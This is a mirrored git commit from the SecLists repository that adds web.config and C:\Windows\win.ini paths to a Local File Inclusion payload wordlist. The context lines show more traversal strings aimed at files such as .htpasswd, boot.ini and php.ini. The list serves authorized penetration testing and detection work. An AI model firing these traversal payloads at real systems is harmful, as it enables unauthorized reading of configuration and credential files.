mirror of
https://github.com/danielmiessler/SecLists
synced 2026-05-08 21:21:10 +02:00
LFI: added absolute C:\Windows\win.ini paths and web.config to LFI-Jhaddix.txt
This commit is contained in:
parent
b70ffb4bd0
commit
6afacc2a9d
1 changed files with 7 additions and 0 deletions
|
|
@ -83,6 +83,11 @@ C:\boot.ini
|
||||||
C:/inetpub/wwwroot/global.asa
|
C:/inetpub/wwwroot/global.asa
|
||||||
C:\inetpub\wwwroot\global.asa
|
C:\inetpub\wwwroot\global.asa
|
||||||
c:\inetpub\wwwroot\index.asp
|
c:\inetpub\wwwroot\index.asp
|
||||||
|
web.config
|
||||||
|
/web.config
|
||||||
|
\web.config
|
||||||
|
../web.config
|
||||||
|
..\web.config
|
||||||
/config.asp
|
/config.asp
|
||||||
../config.asp
|
../config.asp
|
||||||
config.asp
|
config.asp
|
||||||
|
|
@ -781,6 +786,8 @@ users/.htpasswd
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||||
/web/conf/php.ini
|
/web/conf/php.ini
|
||||||
/WINDOWS\php.ini
|
/WINDOWS\php.ini
|
||||||
|
C:\Windows\win.ini
|
||||||
|
C:/Windows/win.ini
|
||||||
../../windows/win.ini
|
../../windows/win.ini
|
||||||
../../../../../../../../windows/win.ini
|
../../../../../../../../windows/win.ini
|
||||||
..\..\..\..\..\..\..\..\windows\win.ini
|
..\..\..\..\..\..\..\..\windows\win.ini
|
||||||
|
|
|
||||||
Loading…
Reference in a new issue